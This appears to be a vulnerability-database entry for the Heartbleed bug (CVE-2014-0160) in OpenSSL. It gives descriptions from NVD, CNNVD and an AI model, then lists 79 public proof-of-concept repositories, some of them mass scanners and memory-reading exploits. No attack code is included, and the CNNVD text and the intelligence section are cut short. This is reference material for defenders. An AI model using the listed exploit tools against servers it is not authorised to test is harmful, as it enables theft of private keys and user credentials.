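I. Basic information for vulnerability CVE-2014-0160
Vulnerability title
N/A
Source: AIGC Shenlong large model
Vulnerability description
In OpenSSL 1.0.1 before 1.0.1g, the TLS and DTLS implementations do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets, for example by reading private keys, related to d1_both.c and t1_lib.c, i.e. the Heartbleed vulnerability.
Source: AIGC Shenlong large model
CVSS information
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Source: AIGC Shenlong large model
Vulnerability category
N/A
Source: AIGC Shenlong large model
Vulnerability title
N/A
Source: U.S. National Vulnerability Database (NVD)
Vulnerability description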
The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.
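Source: U.S. National Vulnerability Database (NVD)
CVSS information
N/A
Source: U.S. National Vulnerability Database (NVD)
Vulnerability category
N/A
Source: U.S. National Vulnerability Database (NVD)
Vulnerability title
OpenSSL buffer error vulnerability
Source: China National Vulnerability Database of Information Security (CNNVD)
Vulnerability description
OpenSSL is an open-source general-purpose cryptographic library developed by the OpenSSL team that implements the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) protocols. It supports a variety of cryptographic algorithms, including symmetric ciphers, hash algorithms, secure hash algorithms, and so on. A security vulnerability exists in the d1_both.c and t1_lib.c files of OpenSSL's TLS and DTLS implementations. The vulnerability stems from a missing bounds check when processing Heartbeat Extension packets. A remote attacker can use specially crafted packets to exploit the vulnerability and read sensitive information in server memory (such as usernames, passwords, cookies, and private keys). The following OpenSSL versions are affected by
Source: China National Vulnerability Database of Information Security (CNNVD)
CVSS information
N/A
Source: China National Vulnerability Database of Information Security (CNNVD)
Vulnerability category
Buffer error
Source: China National Vulnerability Database of Information Security (CNNVD)
II. Public POCs for vulnerability CVE-2014-0160
# POC description Source link Shenlong link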
1 A checker (site and tool) for CVE-2014-0160 https://github.com/FiloSottile/Heartbleed POC details
2 OpenSSL CVE-2014-0160 Heartbleed vulnerability test https://github.com/titanous/heartbleeder POC details
3 bleed is a tool to test servers for the 'Heartbleed' vulnerability (CVE-2014-0160). https://github.com/DominikTo/bleed POC details
4 Mass, multithreaded testing for servers against Heartbleed (CVE-2014-0160). https://github.com/cyphar/heartthreader POC details
5 Patch openssl #heartbleed with ansible https://github.com/jdauphant/patch-openssl-CVE-2014-0160 POC details
6 Multi-threaded tool for scanning many hosts for CVE-2014-0160. https://github.com/musalbas/heartbleed-masstest POC details
7 None https://github.com/obayesshelton/CVE-2014-0160-Scanner POC details
8 Heartbleed (CVE-2014-0160) client exploit https://github.com/Lekensteyn/pacemaker POC details
9 OpenSSL TLS heartbeat read overrun (CVE-2014-0160) https://github.com/isgroup/openmagic POC details
10 openssl Heart Bleed Exploit: CVE-2014-0160 Mass Security Auditor https://github.com/fb1h2s/CVE-2014-0160 POC details
11 Nmap NSE script that discovers/exploits Heartbleed/CVE-2014-0160 https://github.com/takeshixx/ssl-heartbleed.nse POC details
12 Chrome extension that automatically checks visited sites for vulnerability to OpenSSL CVE-2014-0160 https://github.com/roganartu/heartbleedchecker-chrome POC details
13 Checks for vulnerabilities: CVE-2014-0160 https://github.com/zouguangxian/heartbleed POC details
14 Test for SSL heartbeat vulnerability (CVE-2014-0160) https://github.com/sensepost/heartbleed-poc POC details
15 A firefox extension and checker for CVE-2014-0160 https://github.com/proactiveRISK/heartbleed-extention POC details
16 Test CIDR blocks for CVE-2014-0160/Heartbleed https://github.com/amerine/coronary POC details
17 Heartbleed variants https://github.com/0x90/CVE-2014-0160 POC details
18 None https://github.com/ice-security88/CVE-2014-0160 POC details
19 This repo contains a script to automatically test sites for vulnerability to the Heartbleed Bug (CVE-2014-0160) based on the input file for the urls. https://github.com/waqasjamal-zz/HeartBleed-Vulnerability-Checker POC details
20 CVE-2014-0160 mass test against subdomains https://github.com/siddolo/knockbleed POC details
21 OpenSSL Heartbleed (CVE-2014-0160) Fix script https://github.com/sammyfung/openssl-heartbleed-fix POC details
22 CVE-2014-0160 scanner https://github.com/a0726h77/heartbleed-test POC details
23 POC for CVE-2014-0160 (Heartbleed) for DTLS https://github.com/hreese/heartbleed-dtls POC details
24 Script to find Exit and Guard nodes in the Tor Network, that are still suffering from CVE-2014-0160 https://github.com/wwwiretap/bleeding_onions POC details
25 Test script for test 1Password database for SSL Hea(r)t Bleeding (CVE-2014-0160) https://github.com/idkqh7/heatbleeding POC details
26 Nmap NSE script that discovers/exploits Heartbleed/CVE-2014-0160. https://github.com/GeeksXtreme/ssl-heartbleed.nse POC details
27 A research tool designed to check for OpenSSL CVE-2014-0160 vulnerability https://github.com/xlucas/heartbleed POC details
28 A checker (site and tool) for CVE-2014-0160: https://github.com/indiw0rm/-Heartbleed- POC details
29 OpenSSL Heartbleed (CVE-2014-0160) vulnerability scanner, data miner and RSA key-restore tools. https://github.com/einaros/heartbleed-tools POC details
30 A checker (site and tool) for CVE-2014-0160 https://github.com/mozilla-services/Heartbleed POC details
31 openssl Heartbleed bug(CVE-2014-0160) check for Node.js https://github.com/yryz/heartbleed.js POC details
32 Maltego transform to detect the OpenSSL Heartbleed vulnerability (CVE-2014-0160) https://github.com/DisK0nn3cT/MaltegoHeartbleed POC details
33 CVE-2014-0160 (Heartbeat Buffer over-read bug) https://github.com/OffensivePython/HeartLeak POC details
34 Heartbleed (CVE-2014-0160) SSLv3 Scanner https://github.com/vortextube/ssl_scanner POC details
35 :broken_heart: Heartbleed exploit to retrieve sensitive information CVE-2014-0160 :broken_heart: https://github.com/mpgn/heartbleed-PoC POC details
36 Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org), modified by Travis Lee: changed output to display text only instead of hexdump and made it easier to read; added option to specify number of times to connect to server (to get more data); added option to specify TLS version; added option to send STARTTLS command for use with SMTP/POP/IMAP/FTP/etc.; added option to specify an input file of multiple hosts, line delimited, with or without a port specified (host:port); added option to have verbose output; added capability to automatically check if STARTTLS/STLS/AUTH TLS is supported when smtp/pop/imap/ftp ports are entered and automatically send appropriate command. The author disclaims copyright to this source code. https://github.com/xanas/heartbleed.py POC details
37 A checker (site and tool) for CVE-2014-0160. Software from @FiloSottile for iSC Inc.. https://github.com/iSCInc/heartbleed POC details
38 None https://github.com/marstornado/cve-2014-0160-Yunfeng-Jiang POC details
39 Vulnerability as a service: showcasing CVE-2014-0160, a.k.a. Heartbleed https://github.com/hmlio/vaas-cve-2014-0160 POC details
40 Network Scanner for OpenSSL Memory Leak (CVE-2014-0160) https://github.com/hybridus/heartbleedscanner POC details
41 Dockerfile for testing CVE-2014-0160 Heartbleed exploitation. https://github.com/froyo75/Heartbleed_Dockerfile_with_Nginx POC details
42 Heartbleed https://github.com/Xyl2k/CVE-2014-0160-Chrome-Plugin POC details
43 From: https://www.freebuf.com/articles/web/31700.html https://github.com/caiqiqi/OpenSSL-HeartBleed-CVE-2014-0160-PoC POC details
44 CVE-2014-0160 https://github.com/Saymeis/HeartBleed POC details
45 cve-2014-0160 https://github.com/cved-sources/cve-2014-0160 POC details
46 Demonstration of the Heartbleed Bug CVE-2014-0160 https://github.com/cheese-hub/heartbleed POC details
47 None https://github.com/artofscripting-zz/cmty-ssl-heartbleed-CVE-2014-0160-HTTP-HTTPS POC details
48 Example and demo setup for Heartbleed vulnerability (CVE-2014-0160). This should be used for testing purposes only!💔 https://github.com/cldme/heartbleed-bug POC details
49 Here is my new and first web exploit; this exploit targets the HeartBleed vulnerability (CVE-2014-0160). I hope you like it. https://github.com/ThanHuuTuan/Heartexploit POC details
50 Simple OpenSSL TLS Heartbeat (CVE-2014-0160) Scanner and Exploit (Multiple SSL/TLS versions) https://github.com/rouze-d/heartbleed POC details
51 None https://github.com/WildfootW/CVE-2014-0160_OpenSSL_1.0.1f_Heartbleed POC details
52 CVE-2014-0160 OpenSSL Heartbleed Proof of Concept https://github.com/GuillermoEscobero/heartbleed POC details
53 A2SV = Auto Scanning to SSL Vulnerability HeartBleed, CCS Injection, SSLv3 POODLE, FREAK... etc Support Vulnerability [CVE-2007-1858] Anonymous Cipher [CVE-2012-4929] CRIME(SPDY) [CVE-2014-0160] CCS Injection [CVE-2014-0224] HeartBleed [CVE-2014-3566] SSLv3 POODLE [CVE-2015-0204] FREAK Attack [CVE-2015-4000] LOGJAM Attack [CVE-2016-0800] SSLv2 DROWN Installation : $ apt update && apt upgrade $ apt install git $ apt install python2 $ apt install python $ git clone https://github.com/hahwul/ a2sv $ cd a2sv $ chmod +x * $ pip2 install -r requirements.txt usage : $ python2 a2sv.py -h It shows all commands how we can use this tool $ python a2sv.py -t 127.0.0.1 127.0.0.1 = target means here own device https://github.com/clino-mania/A2SV--SSL-VUL-Scan POC details
54 OpenSSL Heartbleed Bug CVE-2014-0160 Toolkit. Built with ❤ by Christopher Ngo. https://github.com/ingochris/heartpatch.us POC details
55 A collection of scripts and instructions to test CVE-2014-0160 (heartbleed). ❤️ 🩸 https://github.com/BelminD/heartbleed POC details
56 The Heartbleed bug `CVE-2014-0160` is a severe implementation flaw in the OpenSSL library, which enables attackers to steal data from the memory of the victim server. The contents of the stolen data depend on what is there in the memory of the server. It could potentially contain private keys, TLS session keys, usernames, passwords, credit cards, etc. The vulnerability is in the implementation of the Heartbeat protocol, which is used by SSL/TLS to keep the connection alive. https://github.com/pierceoneill/bleeding-heart POC details
57 None https://github.com/crypticdante/CVE-2014-0160_Heartbleed POC details
58 fuzzing with libFuzzer, include openssl heartbleed (CVE-2014-0160) https://github.com/GardeniaWhite/fuzzing POC details
59 Proof of concept for exploiting the Heartbeat Extension bug detailed in the CVE-2014-0160. :old_key: :unlock: https://github.com/undacmic/heartbleed-proof-of-concept POC details
60 Check for CVE-2014-0160 https://github.com/cbk914/heartbleed-checker POC details
61 None https://github.com/MrE-Fog/CVE-2014-0160-Chrome-Plugin POC details
62 None https://github.com/timsonner/cve-2014-0160-heartbleed POC details
63 None https://github.com/H3xL00m/CVE-2014-0160_Heartbleed POC details
64 None https://github.com/n3ov4n1sh/CVE-2014-0160_Heartbleed POC details
65 None https://github.com/c0d3cr4f73r/CVE-2014-0160_Heartbleed POC details
66 OpenSSL Heartbleed (CVE-2014-0160) vulnerability scanner. https://github.com/pblittle/aws-suture POC details
67 None https://github.com/Sp3c73rSh4d0w/CVE-2014-0160_Heartbleed POC details
68 None https://github.com/0xwh1pl4sh/CVE-2014-0160_Heartbleed POC details
69 None https://github.com/N3rdyN3xus/CVE-2014-0160_Heartbleed POC details
70 None https://github.com/Yash-Thakkar77/CVE-2014-0160-HeartBleed POC details
71 None https://github.com/NyxByt3/CVE-2014-0160_Heartbleed POC details
72 A collection of scripts and instructions to test CVE-2014-0160 (heartbleed). ❤️ 🩸 https://github.com/belmind/heartbleed POC details
73 None https://github.com/h3xcr4ck3r/CVE-2014-0160_Heartbleed POC details
74 None https://github.com/n3rdh4x0r/CVE-2014-0160_Heartbleed POC details
75 None https://github.com/yashfren/CVE-2014-0160-HeartBleed POC details
76 The Heartbleed bug allows anyone on the Internet to read the memory of the systems protected by the vulnerable versions of the OpenSSL software. This compromises the secret keys used to identify the service providers and to encrypt the traffic, the names and passwords of the users, and the actual content. This allows attackers to eavesdrop on communications, steal data directly from the services and users, and impersonate services and users. https://github.com/projectdiscovery/nuclei-templates/blob/main/code/cves/2014/CVE-2014-0160.yaml POC details
77 None https://github.com/Threekiii/Awesome-POC/blob/master/%E4%B8%AD%E9%97%B4%E4%BB%B6%E6%BC%8F%E6%B4%9E/OpenSSL%20%E5%BF%83%E8%84%8F%E6%BB%B4%E8%A1%80%E6%BC%8F%E6%B4%9E%20CVE-2014-0160.md POC details
78 None https://github.com/Threekiii/Awesome-POC/blob/master/%E4%B8%AD%E9%97%B4%E4%BB%B6%E6%BC%8F%E6%B4%9E/OpenSSL%20%E5%BF%83%E8%84%8F%E5%87%BA%E8%A1%80%E6%BC%8F%E6%B4%9E%20CVE-2014-0160.md POC details
79 https://github.com/vulhub/vulhub/blob/master/openssl/CVE-2014-0160/README.md POC details
III. Intelligence information for vulnerability CVE-2014-0160